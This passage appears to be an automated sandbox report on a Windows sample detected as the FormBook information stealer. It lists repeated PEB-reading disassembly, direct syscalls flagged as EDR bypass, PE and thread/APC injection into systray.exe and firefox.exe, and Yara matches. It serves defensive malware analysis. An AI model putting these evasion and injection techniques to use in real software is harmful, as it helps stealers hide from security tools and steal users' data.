            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F709AD mov eax, dword ptr fs:[00000030h]3_2_00F709AD
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F709AD mov eax, dword ptr fs:[00000030h]3_2_00F709AD
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01006870 mov eax, dword ptr fs:[00000030h]3_2_01006870
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01006870 mov eax, dword ptr fs:[00000030h]3_2_01006870
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFC97C mov eax, dword ptr fs:[00000030h]3_2_00FFC97C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB096E mov eax, dword ptr fs:[00000030h]3_2_00FB096E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB096E mov edx, dword ptr fs:[00000030h]3_2_00FB096E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB096E mov eax, dword ptr fs:[00000030h]3_2_00FB096E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F96962 mov eax, dword ptr fs:[00000030h]3_2_00F96962
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F96962 mov eax, dword ptr fs:[00000030h]3_2_00F96962
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F96962 mov eax, dword ptr fs:[00000030h]3_2_00F96962
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF0946 mov eax, dword ptr fs:[00000030h]3_2_00FF0946
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010408C0 mov eax, dword ptr fs:[00000030h]3_2_010408C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF892A mov eax, dword ptr fs:[00000030h]3_2_00FF892A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103A8E4 mov eax, dword ptr fs:[00000030h]3_2_0103A8E4
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFC912 mov eax, dword ptr fs:[00000030h]3_2_00FFC912
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F68918 mov eax, dword ptr fs:[00000030h]3_2_00F68918
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F68918 mov eax, dword ptr fs:[00000030h]3_2_00F68918
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE908 mov eax, dword ptr fs:[00000030h]3_2_00FEE908
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE908 mov eax, dword ptr fs:[00000030h]3_2_00FEE908
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAAAEE mov eax, dword ptr fs:[00000030h]3_2_00FAAAEE
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAAAEE mov eax, dword ptr fs:[00000030h]3_2_00FAAAEE
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F70AD0 mov eax, dword ptr fs:[00000030h]3_2_00F70AD0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA4AD0 mov eax, dword ptr fs:[00000030h]3_2_00FA4AD0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA4AD0 mov eax, dword ptr fs:[00000030h]3_2_00FA4AD0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01038B28 mov eax, dword ptr fs:[00000030h]3_2_01038B28
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01038B28 mov eax, dword ptr fs:[00000030h]3_2_01038B28
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FC6ACC mov eax, dword ptr fs:[00000030h]3_2_00FC6ACC
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FC6ACC mov eax, dword ptr fs:[00000030h]3_2_00FC6ACC
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FC6ACC mov eax, dword ptr fs:[00000030h]3_2_00FC6ACC
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01006B40 mov eax, dword ptr fs:[00000030h]3_2_01006B40
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01006B40 mov eax, dword ptr fs:[00000030h]3_2_01006B40
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103AB40 mov eax, dword ptr fs:[00000030h]3_2_0103AB40
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01018B42 mov eax, dword ptr fs:[00000030h]3_2_01018B42
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01024B4B mov eax, dword ptr fs:[00000030h]3_2_01024B4B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01024B4B mov eax, dword ptr fs:[00000030h]3_2_01024B4B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101EB50 mov eax, dword ptr fs:[00000030h]3_2_0101EB50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01042B57 mov eax, dword ptr fs:[00000030h]3_2_01042B57
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01042B57 mov eax, dword ptr fs:[00000030h]3_2_01042B57
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01042B57 mov eax, dword ptr fs:[00000030h]3_2_01042B57
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01042B57 mov eax, dword ptr fs:[00000030h]3_2_01042B57
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F78AA0 mov eax, dword ptr fs:[00000030h]3_2_00F78AA0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F78AA0 mov eax, dword ptr fs:[00000030h]3_2_00F78AA0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FC6AA4 mov eax, dword ptr fs:[00000030h]3_2_00FC6AA4
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA8A90 mov edx, dword ptr fs:[00000030h]3_2_00FA8A90
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h]3_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FECA72 mov eax, dword ptr fs:[00000030h]3_2_00FECA72
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FECA72 mov eax, dword ptr fs:[00000030h]3_2_00FECA72
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FACA6F mov eax, dword ptr fs:[00000030h]3_2_00FACA6F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FACA6F mov eax, dword ptr fs:[00000030h]3_2_00FACA6F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FACA6F mov eax, dword ptr fs:[00000030h]3_2_00FACA6F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80A5B mov eax, dword ptr fs:[00000030h]3_2_00F80A5B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80A5B mov eax, dword ptr fs:[00000030h]3_2_00F80A5B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h]3_2_00F76A50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h]3_2_00F76A50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h]3_2_00F76A50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h]3_2_00F76A50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h]3_2_00F76A50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h]3_2_00F76A50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h]3_2_00F76A50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01024BB0 mov eax, dword ptr fs:[00000030h]3_2_01024BB0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01024BB0 mov eax, dword ptr fs:[00000030h]3_2_01024BB0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FACA38 mov eax, dword ptr fs:[00000030h]3_2_00FACA38
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F94A35 mov eax, dword ptr fs:[00000030h]3_2_00F94A35
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F94A35 mov eax, dword ptr fs:[00000030h]3_2_00F94A35
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101EBD0 mov eax, dword ptr fs:[00000030h]3_2_0101EBD0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9EA2E mov eax, dword ptr fs:[00000030h]3_2_00F9EA2E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FACA24 mov eax, dword ptr fs:[00000030h]3_2_00FACA24
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFCA11 mov eax, dword ptr fs:[00000030h]3_2_00FFCA11
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9EBFC mov eax, dword ptr fs:[00000030h]3_2_00F9EBFC
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F78BF0 mov eax, dword ptr fs:[00000030h]3_2_00F78BF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F78BF0 mov eax, dword ptr fs:[00000030h]3_2_00F78BF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F78BF0 mov eax, dword ptr fs:[00000030h]3_2_00F78BF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFCBF0 mov eax, dword ptr fs:[00000030h]3_2_00FFCBF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F90BCB mov eax, dword ptr fs:[00000030h]3_2_00F90BCB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F90BCB mov eax, dword ptr fs:[00000030h]3_2_00F90BCB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F90BCB mov eax, dword ptr fs:[00000030h]3_2_00F90BCB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F70BCD mov eax, dword ptr fs:[00000030h]3_2_00F70BCD
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F70BCD mov eax, dword ptr fs:[00000030h]3_2_00F70BCD
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F70BCD mov eax, dword ptr fs:[00000030h]3_2_00F70BCD
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80BBE mov eax, dword ptr fs:[00000030h]3_2_00F80BBE
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80BBE mov eax, dword ptr fs:[00000030h]3_2_00F80BBE
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101EA60 mov eax, dword ptr fs:[00000030h]3_2_0101EA60
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01044A80 mov eax, dword ptr fs:[00000030h]3_2_01044A80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6CB7E mov eax, dword ptr fs:[00000030h]3_2_00F6CB7E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9EB20 mov eax, dword ptr fs:[00000030h]3_2_00F9EB20
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9EB20 mov eax, dword ptr fs:[00000030h]3_2_00F9EB20
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h]3_2_00FEEB1D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA2CF0 mov eax, dword ptr fs:[00000030h]3_2_00FA2CF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA2CF0 mov eax, dword ptr fs:[00000030h]3_2_00FA2CF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory written: C:\Users\user\Desktop\CMV610942X6UI.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: NULL target: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 1036Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\systray.exeThread APC queued: target process: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess created: C:\Users\user\Desktop\CMV610942X6UI.exe "C:\Users\user\Desktop\CMV610942X6UI.exe"Jump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: ZkqZZBQxQqm.exe, 00000007.00000000.1716276781.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261286689.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858538109.00000000018E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: ZkqZZBQxQqm.exe, 00000007.00000000.1716276781.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261286689.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858538109.00000000018E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: ZkqZZBQxQqm.exe, 00000007.00000000.1716276781.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261286689.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858538109.00000000018E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: ZkqZZBQxQqm.exe, 00000007.00000000.1716276781.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261286689.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858538109.00000000018E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeQueries volume information: C:\Users\user\Desktop\CMV610942X6UI.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
